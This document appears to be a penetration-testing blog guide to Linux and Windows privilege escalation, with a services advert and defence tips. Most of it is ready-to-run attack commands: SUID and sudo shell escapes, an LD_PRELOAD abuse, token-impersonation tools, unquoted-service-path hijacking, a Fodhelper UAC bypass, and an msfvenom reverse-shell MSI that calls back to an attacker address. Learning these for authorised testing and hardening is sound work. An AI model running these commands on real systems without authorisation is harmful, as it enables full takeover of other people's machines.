Privilege Escalation

Published: December 2, 2025 Reading Time: 20 mins
👤 Low Privilege user@system Privilege Escalation 👑 Administrator SYSTEM / root Full Control Common Vectors: • Kernel Exploits • SUID Binaries • Sudo Misconfig • Weak Permissions • Service Exploits

Privilege escalation is the process of exploiting vulnerabilities, misconfigurations, or weaknesses to gain elevated access on a system. This guide covers essential techniques for both Windows and Linux privilege escalation used in penetration testing.

💡

Understanding Privilege Escalation

After gaining initial access to a system with limited privileges, attackers often need to escalate to administrator, root, or SYSTEM level access to achieve their objectives. Understanding these techniques is crucial for both offensive testing and defensive hardening.

Linux Privilege Escalation

Linux Privilege Escalation

Enumeration

# System information
uname -a
cat /etc/os-release
cat /proc/version

# User and group information
id
whoami
groups
cat /etc/passwd
cat /etc/group

# Sudo permissions
sudo -l

# SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# Writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null

# Running processes
ps aux
ps -ef

# Network connections
netstat -antup
ss -tunlp

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l

SUID Exploitation

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Exploitable SUID binaries (GTFOBins)
# /usr/bin/find
find . -exec /bin/sh -p \; -quit

# /usr/bin/vim
vim -c ':!/bin/sh'

# /usr/bin/nmap (older versions)
nmap --interactive
!sh

# /usr/bin/perl
perl -e 'exec "/bin/sh";'

# /usr/bin/python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# Custom SUID binary exploitation
# Check for buffer overflow or path hijacking

Sudo Exploitation

# Check sudo permissions
sudo -l

# Sudo with no password
(ALL : ALL) NOPASSWD: /usr/bin/find
sudo find . -exec /bin/sh \; -quit

# Sudo with environment variables
sudo -E /path/to/script

# Sudo version vulnerabilities
# CVE-2021-3156 (Baron Samedit)
sudoedit -s /

# LD_PRELOAD exploitation
# If env_keep+=LD_PRELOAD is set
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=./shell.so /any/allowed/binary
SUID and Sudo Exploitation

Kernel Exploits

# Check kernel version
uname -r
cat /proc/version

# Common kernel exploits
# Dirty COW (CVE-2016-5195)
# DirtyCOW affects Linux kernel < 4.8.3

# Dirty Pipe (CVE-2022-0847)
# Affects Linux 5.8+

# Search for exploits
searchsploit "linux kernel $(uname -r)"

# Linux Exploit Suggester
./linux-exploit-suggester.sh
./linux-smart-enumeration.sh

Windows Privilege Escalation

Enumeration

# System information
systeminfo
hostname
echo %USERNAME%

# User and group information
whoami /all
whoami /priv
net user
net localgroup administrators

# Running processes
tasklist /v
wmic process list full

# Installed software
wmic product get name,version
dir "C:\Program Files"

# Network information
ipconfig /all
netstat -ano

# Scheduled tasks
schtasks /query /fo LIST /v

# Services
net start
wmic service list brief
sc query

Token Impersonation

# Check privileges
whoami /priv

# SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
# Use Juicy Potato (Windows Server 2016 and older)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami > C:\temp\output.txt" -t *

# Use PrintSpoofer (Windows 10/Server 2019+)
PrintSpoofer.exe -i -c cmd

# Use RoguePotato
RoguePotato.exe -r 10.0.0.1 -e "cmd.exe" -l 9999

# Metasploit incognito
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

Unquoted Service Paths

# Find unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Example vulnerable path:
# C:\Program Files\Some Service\service.exe
# Windows tries: C:\Program.exe, C:\Program Files\Some.exe

# Check write permissions
icacls "C:\Program Files\Some Service"

# Place malicious executable
copy payload.exe "C:\Program Files\Some.exe"

# Restart service
sc stop vulnerableservice
sc start vulnerableservice
Windows Privilege Escalation

AlwaysInstallElevated

# Check if AlwaysInstallElevated is enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both return 0x1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f msi -o payload.msi

# Install with elevated privileges
msiexec /quiet /qn /i payload.msi

UAC Bypass

# Check UAC level
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

# Fodhelper UAC bypass
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"

# ComputerDefaults UAC bypass
# Event Viewer UAC bypass
# sdclt UAC bypass

Automated Enumeration Tools

Linux Tools

  • LinPEAS: Comprehensive Linux privilege escalation scanner
  • LinEnum: Scripted local Linux enumeration
  • Linux Smart Enumeration (LSE): Color-coded privilege escalation info
  • pspy: Monitor processes without root permissions

Windows Tools

  • WinPEAS: Windows privilege escalation scanner
  • PowerUp: PowerShell privilege escalation framework
  • Seatbelt: C# security-oriented enumeration tool
  • SharpUp: C# port of PowerUp
  • Windows Exploit Suggester: Identifies missing patches
# Run WinPEAS
winPEASx64.exe

# Run LinPEAS
./linpeas.sh

# PowerUp
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"

# Seatbelt
Seatbelt.exe -group=all
⚠️

Ethical Use Only

Privilege escalation techniques should only be used in authorized penetration testing engagements with proper written permission. Unauthorized system access is illegal.

HackHub Professional Services

🚀

Expert Privilege Escalation Testing

The HackHub team provides comprehensive privilege escalation assessments for both Windows and Linux environments. With over 10 years of experience, we identify configuration weaknesses, missing patches, and privilege escalation vectors that could be exploited by attackers.

Our Services:

  • Windows Privilege Escalation Assessment
  • Linux Privilege Escalation Testing
  • Active Directory Security Review
  • System Hardening Consultation

Contact [email protected] for professional security services.

Defense Recommendations

  • Patch Management: Keep systems and software up to date
  • Least Privilege: Users should have minimum necessary permissions
  • Application Whitelisting: Control what can execute
  • Disable Unnecessary Services: Reduce attack surface
  • UAC Settings: Configure appropriately for environment
  • File Permissions: Audit and fix weak permissions
  • Monitoring: Detect privilege escalation attempts
  • Remove Dangerous Privileges: SeImpersonate, SeDebug when not needed

Conclusion

Privilege escalation is a critical phase in penetration testing that reveals how an attacker with limited access can gain complete control of a system. Understanding these techniques helps security professionals identify and remediate vulnerabilities before they can be exploited. Regular security assessments and proper system hardening are essential for preventing privilege escalation attacks.